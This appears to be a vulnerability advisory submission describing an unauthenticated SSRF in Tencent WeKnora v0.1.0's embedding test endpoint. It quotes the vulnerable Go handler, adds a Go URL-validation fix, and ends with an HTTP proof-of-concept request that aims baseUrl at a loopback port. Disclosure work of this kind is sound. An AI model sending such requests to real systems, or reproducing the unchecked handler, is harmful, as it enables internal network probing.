| Title | Tencent WeKnora v0.1.0 Server-Side Request Forgery |
|---|---|
| Description | (full text below) |

# Summary
Tencent WeKnora v0.1.0 contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the `/api/v1/initialization/embedding/test` endpoint. Attackers can exploit this to probe internal network services by manipulating the `baseUrl` parameter when the `source` parameter is set to `"remote"`.
# Details
The `/api/v1/initialization/embedding/test` endpoint lacks authentication and proper input validation.
When the `source` parameter is set to `"remote"`, the `baseUrl` parameter is used as the target of a server-side HTTP request without any restriction, so the request can be directed at internal IP addresses and ports.
```ts
// Frontend wrapper; `post` is the project's HTTP helper.
export function testEmbeddingModel(modelConfig: {
  source: 'local' | 'remote';
  modelName: string;
  baseUrl?: string;
  apiKey?: string;
  dimension?: number;
}): Promise<{ available: boolean; message?: string; dimension?: number }> {
  return new Promise((resolve, reject) => {
    post('/api/v1/initialization/embedding/test', modelConfig) // call the backend endpoint directly
      .then((response: any) => resolve(response.data || {}))
      .catch((error: any) => reject(error));
  });
}
```
```go
func (h *InitializationHandler) TestEmbeddingModel(c *gin.Context) {
	var req struct {
		Source    string `json:"source" binding:"required"`
		ModelName string `json:"modelName" binding:"required"`
		BaseURL   string `json:"baseUrl"`
		APIKey    string `json:"apiKey"`
	}
	if err := c.ShouldBindJSON(&req); err != nil {
		c.Error(errors.NewBadRequestError(err.Error()))
		return
	}
	if req.Source == "remote" {
		client := &http.Client{Timeout: 15 * time.Second}
		// Vulnerable: the caller-supplied baseUrl becomes the request target
		// with no scheme, host or destination-address validation.
		resp, err := client.Get(req.BaseURL + "/embeddings")
		if err != nil {
			c.JSON(200, gin.H{"available": false})
			return
		}
		defer resp.Body.Close()
		c.JSON(200, gin.H{
			"available": resp.StatusCode == 200,
			"dimension": 1024, // sample value
		})
		return
	}
}
```
No filtering is applied to prevent access to internal network resources.
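One way to supply the missing filtering on the server side, as an added example written for this page and not code from the WeKnora project: `validateRemoteBaseURL` (a hypothetical name) is the check the handler above would run before `client.Get`. It rejects non-http(s) schemes, URLs carrying credentials, and any host whose resolved addresses are loopback, private, link-local, multicast or unspecified; the URLs in `main` are constructed samples.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
)

// isBlockedIP reports whether an address must never be reached on behalf of an
// anonymous caller: loopback, RFC 1918/ULA (IsPrivate, Go 1.17+), link-local
// (which covers 169.254.169.254 metadata services), multicast, unspecified.
func isBlockedIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() || ip.IsMulticast() || ip.IsUnspecified()
}

// validateRemoteBaseURL enforces http(s) only, no embedded credentials, and a
// host whose every resolved address is public. The resolved IPs are returned so
// the caller can dial exactly those addresses instead of re-resolving the name.
func validateRemoteBaseURL(raw string) ([]net.IP, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return nil, fmt.Errorf("invalid baseUrl: %w", err)
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return nil, errors.New("baseUrl scheme must be http or https")
	}
	if u.User != nil || u.Hostname() == "" {
		return nil, errors.New("baseUrl must name a host and carry no credentials")
	}
	ips, err := net.LookupIP(u.Hostname()) // IP literals resolve without DNS
	if err != nil {
		return nil, fmt.Errorf("baseUrl host does not resolve: %w", err)
	}
	for _, ip := range ips {
		if isBlockedIP(ip) {
			return nil, fmt.Errorf("baseUrl resolves to non-public address %s", ip)
		}
	}
	return ips, nil
}

func main() {
	// Constructed inputs: the advisory's PoC target, a metadata-service address,
	// and a documentation-range (TEST-NET-3) literal that passes the check.
	for _, raw := range []string{"http://127.0.0.1:520", "http://169.254.169.254/latest", "https://203.0.113.10/v1"} {
		_, err := validateRemoteBaseURL(raw)
		fmt.Printf("%-32s -> %v\n", raw, err)
	}
}
```

Because `http.Client` follows redirects by default, the same check belongs in a `CheckRedirect` hook as well, and the handler should connect to the returned IPs rather than let the transport resolve the hostname again.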
# Proof of Concept (PoC)
```http
POST /api/v1/initialization/embedding/test HTTP/1.1
Host: 192.168.0.22
Content-Type: application/json

{
  "source": "remote",
  "modelName": "test",
  "baseUrl": "http://127.0.0.1:520"
}
```

| Source | https://github.com/Hebing123/cve/issues/90 |
|---|---|
| User | jiashenghe (UID 39445) |
| Submitted | 2025-09-19 11:40 AM (7 months ago) |
| Moderation | 2025-09-26 11:31 AM (7 days later) |
| Status | Accepted |
| VulDB entry | 326083 [Tencent WeKnora 0.1.0 test testEmbeddingModel baseUrl privilege escalation] |
| Points | 20 |